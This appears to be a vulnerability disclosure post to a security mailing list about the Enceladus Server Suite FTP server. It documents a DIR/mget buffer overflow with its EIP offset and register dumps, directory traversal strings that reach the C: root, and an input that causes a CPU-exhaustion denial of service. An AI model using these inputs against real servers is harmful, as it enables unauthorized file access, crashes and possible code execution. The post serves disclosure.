Multiple vulnerability in Enceladus Server

[securma massine <securma () caramail com>]

hi
Enceladus Server Suite is an Internet/Intranet lightweight Web and
FTP Server for
Windows, the version 3.9 according to mollensoft "Includes a fix to
the directory traversal vulnerability... ( This is a CRITICAL
SECURITY UPDATE)"
http://www.mollensoft.com/
I found several vulnerability critical concerning this server
1-buffer overflow and remote code execution:
tamer notified that the waiter crashait with "long sequence of
characters as an argument to "CD" command"
(http://online.securityfocus.com/archive/1/302596)..I believe that
it passed dimensioned of a true buffer overflow because this crash
allows only a overwrite ' ESP and thusune simple attaque DOS
50e091e3 803820 cmp byte ptr [eax],0x20
(ftpservx.dll)
with argument "DIR" we can overwrite eip
dir+[buffer =279byte] >> eip is overwritet at:42,43,44,45
 sufficient for the injection of a shellcode
the state of the registers is:

Access violation - code c0000005 (first chance)
eax=0012bcb8 ebx=0012c574 ecx=61616161 edx=7846f5b5 esi=0012bce0
edi=0019affd
eip=61616161 esp=0012bc20 ebp=0012bc40 iopl=0 nv up ei pl
zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00000246
61616161 ?? ???

it is noticed whereas the eip is at the beginning of our buffer
ftp> dir aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[EIP=4BYTE]
aaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

the argument "mget" gives also the same result
the exploit is simple of realization since ebx point towards our
buffer
0012c274 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61

2- directory traversal


ftp>cd ..
access denied
ftp>cd cd @/....\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
drwxr-xr-x 1 User Group 0 Dec 18 12:59 anonymous-
ftp
drwxr-xr-x 1 User Group 0 Dec 18 12:59 downloads
-rwxr-xr-x 1 User Group 8544 Mar 18 02:09
emailme.html
-rwxr-xr-x 1 User Group 878 Mar 16 04:52
execupload.html
-rwxr-xr-x 1 User Group 1033 Oct 27 02:22
exitstatus.html
-rwxr-xr-x 1 User Group 5965 Mar 18 02:12
fileuplogin.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 ftproot
drwxr-xr-x 1 User Group 0 Dec 18 12:59 images
-rwxr-xr-x 1 User Group 6783 Mar 18 02:11 index.html
-rwxr-xr-x 1 User Group 4465 Mar 18 02:09 Links.html
-rwxr-xr-x 1 User Group 1299 Mar 18 23:41
mailexitstatus.html
-rwxr-xr-x 1 User Group 4402 Mar 18 02:09
MyPictures.html
drwxr-xr-x 1 User Group 0 Dec 18 12:59 secure-
downloads
-rwxr-xr-x 1 User Group 5082 Mar 18 02:09
signguestbook.html
-rwxr-xr-x 1 User Group 5188 Mar 18 02:09 upload.html
ftp> cd @@@@@@@@@@@/..c:\
250 CWD command successful.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for /bin/ls.
226 Listing complete.
ftp> pwd
257 "c:/" is current directory.
ftp> dir

[NO COMMENT]

3-denial of service and consume cpu
ftp> cd @/..@/..
(no reponse)
cpu 99% used

securma massine




_________________________________________________________
Gagne une PS2 ! Envoie un SMS avec le code PS au 61166
(0,35€ Hors coût du SMS)